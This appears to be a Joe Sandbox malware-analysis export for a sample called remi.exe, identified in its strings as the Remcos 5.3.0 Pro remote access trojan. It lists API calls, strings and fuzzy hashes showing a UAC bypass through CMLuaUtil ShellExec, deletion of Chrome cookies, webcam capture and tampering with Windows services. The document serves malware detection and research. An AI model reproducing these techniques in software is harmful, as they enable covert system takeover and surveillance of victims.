                                                                                                                                                                                                                                                                                                  • Part of subcall function 00446AC5: GetLastError.KERNEL32(?,?,0044FA50,?,00000000,?,00000000,?,0044FCF4,?,00000007,?,?,00450205,?,?), ref: 00446AED
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FD34
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FD3F
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FD93
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FD9E
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FDA9
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 0044FDB4
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: _free$ErrorFreeHeapLast
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 776569668-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                                                                                • Instruction ID: b6f47af98b99390d2ca34363280ce03bc5e4d1be0f6c4f29549f69d6ae0d3a9a
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 7c29d87e7d6a666a6374703866dd42c53a280d6db8acc668fe4e1522d65ba280
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5F119031711B04B6F520FBB2CC07FCBB7DC9F42308F814C2EB29E76152E628A9184645
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CoInitializeEx.OLE32(00000000,00000002,00000000,C:\Users\user\Desktop\remi.exe), ref: 00406835
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406764: _wcslen.LIBCMT ref: 00406788
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00406764: CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9
                                                                                                                                                                                                                                                                                                • CoUninitialize.OLE32 ref: 0040688E
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeObjectUninitialize_wcslen
                                                                                                                                                                                                                                                                                                • String ID: C:\Users\user\Desktop\remi.exe$[+] ShellExec success$[+] before ShellExec$[+] ucmCMLuaUtilShellExecMethod
                                                                                                                                                                                                                                                                                                • API String ID: 3851391207-1018889883
                                                                                                                                                                                                                                                                                                • Opcode ID: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                                                                                                • Instruction ID: 622c6236034ee416db36617ed9a374104512909f75adacabffe0517dc70a223e
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: cc256bbe825efe690782e207798e63cf697be23d062579cdcaa40baaa38e88a5
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A501C0722013106FE2287B11DC0EF3B2658DB4176AF22413FF946A71C1EAA9AC104669
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • std::_Lockit::_Lockit.LIBCPMT ref: 0040FEDF
                                                                                                                                                                                                                                                                                                • int.LIBCPMT ref: 0040FEF2
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::_Lockit.LIBCPMT ref: 0040CEF1
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0040CEE0: std::_Lockit::~_Lockit.LIBCPMT ref: 0040CF0B
                                                                                                                                                                                                                                                                                                • std::_Facet_Register.LIBCPMT ref: 0040FF2E
                                                                                                                                                                                                                                                                                                • std::_Lockit::~_Lockit.LIBCPMT ref: 0040FF54
                                                                                                                                                                                                                                                                                                • __CxxThrowException@8.LIBVCRUNTIME ref: 0040FF70
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_RegisterThrow
                                                                                                                                                                                                                                                                                                • String ID: H]G
                                                                                                                                                                                                                                                                                                • API String ID: 2536120697-1717957184
                                                                                                                                                                                                                                                                                                • Opcode ID: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                                                                                                                                                                                                • Instruction ID: c39742161ac3258eace465d30f2780732a1ff9819e97f4bd037edafe9ec39b9f
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 3e4a8574ab9db7722bfa12a95caa071d2d4e3d0815d43ad0032f2c9a3dec5087
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9011BF31900419ABCB24FBA5C8468DDB7799F95318B20007FF505B72C1EB78AF09C799
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Cookies), ref: 0040B2E4
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32 ref: 0040B2EE
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                • [Chrome Cookies not found], xrefs: 0040B308
                                                                                                                                                                                                                                                                                                • UserProfile, xrefs: 0040B2B4
                                                                                                                                                                                                                                                                                                • \AppData\Local\Google\Chrome\User Data\Default\Cookies, xrefs: 0040B2AF
                                                                                                                                                                                                                                                                                                • [Chrome Cookies found, cleared!], xrefs: 0040B314
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: DeleteErrorFileLast
                                                                                                                                                                                                                                                                                                • String ID: [Chrome Cookies found, cleared!]$[Chrome Cookies not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Cookies
                                                                                                                                                                                                                                                                                                • API String ID: 2018770650-304995407
                                                                                                                                                                                                                                                                                                • Opcode ID: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                                                                                                                                                                                                                • Instruction ID: 647c9f6895dd19beb09db90be4e639f81332b1b521455d1adc7a9c6a9ee315b4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 89984b89c506dd7c72a5c030867ac5c43e97c4af1a23029286eaf0e318e25243
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301A23164410557CB047BB5DD6B8AF3624ED50708F60013FF802B32E2FE3A9A0586CE
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • AllocConsole.KERNEL32(00474358), ref: 0041BEB9
                                                                                                                                                                                                                                                                                                • ShowWindow.USER32(00000000,00000000), ref: 0041BED2
                                                                                                                                                                                                                                                                                                • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041BEF7
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Console$AllocOutputShowWindow
                                                                                                                                                                                                                                                                                                • String ID: Remcos v$5.3.0 Pro$CONOUT$
                                                                                                                                                                                                                                                                                                • API String ID: 2425139147-2527699604
                                                                                                                                                                                                                                                                                                • Opcode ID: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                                                                                                                                • Instruction ID: 482f1cdaf256b8236abc94a0b12de3dc55517b66349f776fa4240982defd8f75
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 665a097808b038229c9a37eafed355beb7ea993dcaa7ec452e19bba1328996a1
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 180171B19803047BD600FBF29D4BFDD37AC9B14705F5004277644E7093EABCA554866D
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                                                                                                                • String ID: (CG$C:\Users\user\Desktop\remi.exe$BG
                                                                                                                                                                                                                                                                                                • API String ID: 0-3428681510
                                                                                                                                                                                                                                                                                                • Opcode ID: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                                                                                                                                • Instruction ID: a0817f974ad937f6cb5b9dd001e5131ae01746641b95ac10126ddf8aadfa6e31
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d1be4aec57154437973d558091bbe471e33116169eb7d1567a4c56866b781843
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 05F096B17022109BDB103774BC1967A3645A780356F01847BF94BFA6E5DB3C8851869C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                  • Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0
                                                                                                                                                                                                                                                                                                • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 00419F64
                                                                                                                                                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000), ref: 00419F72
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00002710), ref: 00419F79
                                                                                                                                                                                                                                                                                                • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 00419F82
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: PlaySound$HandleLocalModuleSleepTime
                                                                                                                                                                                                                                                                                                • String ID: Alarm triggered$`#v
                                                                                                                                                                                                                                                                                                • API String ID: 614609389-3049340936
                                                                                                                                                                                                                                                                                                • Opcode ID: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                                                                                                                                                                                                                                                • Instruction ID: 0fe531f7edf44dbbc4d7c544cb5d4c76277d8d7fe89cd9bd4aa838a143c441bc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 141847ae0a337ee7d375b115724b17f178aaf380715d2b927a7afb315ef2a384
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 50E09A22A0422033862033BA7C0FC6F3E28DAC6B75B4100BFF905A21A2AE54081086FB
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 00439789
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397A5
                                                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 004397BC
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004397DA
                                                                                                                                                                                                                                                                                                • __allrem.LIBCMT ref: 004397F1
                                                                                                                                                                                                                                                                                                • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0043980F
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 1992179935-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                                                                                                                                                                                                                                                                • Instruction ID: 29148231e9435c1f59b8c02308e8e4f0c882d016d38a0f6ab7871d26eba04b65
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f1fde5a02fd595428c5ea82786117b3ca59670a7c5a9c6947d2ee4ceb3542413
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 7A811B726017069BE724AE79CC82B6F73A8AF49328F24512FF511D66C1E7B8DD018B58
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __cftoe
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 4189289331-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                                                                                                                                                                                                                                                                • Instruction ID: 646e0444ce84107b4b6d0ff1d92098e8eb0dfa86acef9ec08128487301265115
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 9b2fc1694d82a2623a89bc6481469fa908d9f87ebd85e1474d8b0e6b87dad09b
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A851FC72900105ABFB249F598C81F6F77A9EFC9324F15421FF815A6281DB3DDD01866D
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: __freea$__alloca_probe_16
                                                                                                                                                                                                                                                                                                • String ID: a/p$am/pm
                                                                                                                                                                                                                                                                                                • API String ID: 3509577899-3206640213
                                                                                                                                                                                                                                                                                                • Opcode ID: 878f267278134c9071f936cebdfefb8e9459c977e50b15d673de31b0c138741a
                                                                                                                                                                                                                                                                                                • Instruction ID: cf09b504ad0dd49156c227457699755419044adef71e8be36bbdd309731302d4
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 878f267278134c9071f936cebdfefb8e9459c977e50b15d673de31b0c138741a
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 5FD1F271A00206EAFB249F68D945ABBB7B0FF06300F26415BE905AB749D37D8D41CB5B
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNEL32(00000000), ref: 00403E8A
                                                                                                                                                                                                                                                                                                  • Part of subcall function 00403FCD: __EH_prolog.LIBCMT ref: 00403FD2
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: H_prologSleep
                                                                                                                                                                                                                                                                                                • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera$P>G
                                                                                                                                                                                                                                                                                                • API String ID: 3469354165-462540288
                                                                                                                                                                                                                                                                                                • Opcode ID: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                                                                                                                                                                                                                                                                • Instruction ID: 0dce3c58988623f436d5c5d916b021fc345e3c2d86dff9f08dc17926b78fee06
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 91ddb64871bfde904ede40e3b9f088facac6f709450aecbaf3ccac608dc9d27d
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A441A330A0420197CA14FB79C816AAD3A655B45704F00453FF809A73E2EF7C9A45C7CF
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000002,00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419DFC
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000002,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E10
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E1D
                                                                                                                                                                                                                                                                                                • ChangeServiceConfigW.ADVAPI32(00000000,000000FF,00000004,000000FF,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,00419507), ref: 00419E52
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E64
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,00000000,?,?,00419507,00000000,00000000), ref: 00419E67
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ChangeConfigManager
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 493672254-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                                                                                                                                • Instruction ID: c28812c6d5a3476d8c1fe7dae916194da5da8b168be8dbaba893861dad7fc5da
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 02b88ba3e7911ce8c5ead6755d78df319317ed7b9ebc03ba342fc4c032229c57
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 3301F5311483147AD7119B39EC5EEBF3AACDB42B71F10022BF526D62D1DA68DE8181A9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,00437DFD,004377B1), ref: 00437E14
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 00437E22
                                                                                                                                                                                                                                                                                                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 00437E3B
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,?,00437DFD,004377B1), ref: 00437E8D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLastValue___vcrt_
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3852720340-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                                                                                                                                • Instruction ID: be779a20f6972cc68ff7cd304671387be2c97454b743a33de387a584dbd8fa65
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 8677577c8e37d81537f7299acd8b5f5a9cc683e2404a7ed47504fd76d00458cf
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2A01D8B222D315ADEB3427757C87A172699EB09779F2013BFF228851E1EF294C41914C
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446EF6
                                                                                                                                                                                                                                                                                                • _free.LIBCMT ref: 00446F1E
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B
                                                                                                                                                                                                                                                                                                • SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
                                                                                                                                                                                                                                                                                                • _abort.LIBCMT ref: 00446F3D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorLast$_free$_abort
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3160817290-0
                                                                                                                                                                                                                                                                                                • Opcode ID: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                • Instruction ID: 3d2b287d931d31d162837175e2379b90ae0e47a7897f975c134f35b9cb22fcab
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: c8da7f0c6bc53abe63124bd11b18efa7ba6299d8fddab580282761fd2749e6ad
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 2AF0F93560870177F6226339BD45A6F16559BC37A6F36003FF414A2293EE2D8C46451F
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C2F
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C43
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C50
                                                                                                                                                                                                                                                                                                • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C5F
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C71
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041979B,00000000,00000000), ref: 00419C74
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                • Opcode ID: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                                                                                • Instruction ID: e05d85410d15b39c35b215a1997cf582e970b4d0c8f2e3caff6268b58306b2a8
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: b7b71ddbdcb9800aa748b97a69a48af82292e20b181655901ef109c96cd029b9
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: F2F0F6325003147BD3116B25EC89EFF3BACDB45BA1F000036F902921D2DB68CD4685F5
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D31
                                                                                                                                                                                                                                                                                                • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D45
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D52
                                                                                                                                                                                                                                                                                                • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D61
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D73
                                                                                                                                                                                                                                                                                                • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,00419719,00000000,00000000), ref: 00419D76
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 00000006.00000002.2133613614.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_6_2_400000_remi.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Service$CloseHandle$Open$ControlManager
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 221034970-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                                                                                • Instruction ID: 9e91e616c68215657d038be5823d6e3897a30bcf6e0764f9fcdf2292ad9a2404
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e9ecc3ae41f79f47d3bdca3e192fe5417343a180787152718365ee8199a3ebfc
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: C5F062725003146BD2116B65EC89EBF3BACDB45BA5B00003AFA06A21D2DB68DD4696F9
                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,?,?,?,?,?,?,00419697,00000000,00000000), ref: 00419D96
